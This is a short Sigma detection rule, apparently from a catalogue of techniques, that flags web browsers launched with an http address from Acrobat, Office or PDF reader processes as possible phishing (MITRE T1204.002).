Techniques
Sample rules
Potential Suspicious Browser Launch From Document Reader Process
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
Detection logic
condition: selection
selection:
CommandLine|contains: http
Image|endswith:
- \brave.exe
- \chrome.exe
- \firefox.exe
- \msedge.exe
- \opera.exe
- \maxthon.exe
- \seamonkey.exe
- \vivaldi.exe
- ''
ParentImage|contains:
- Acrobat Reader
- Microsoft Office
- PDF Reader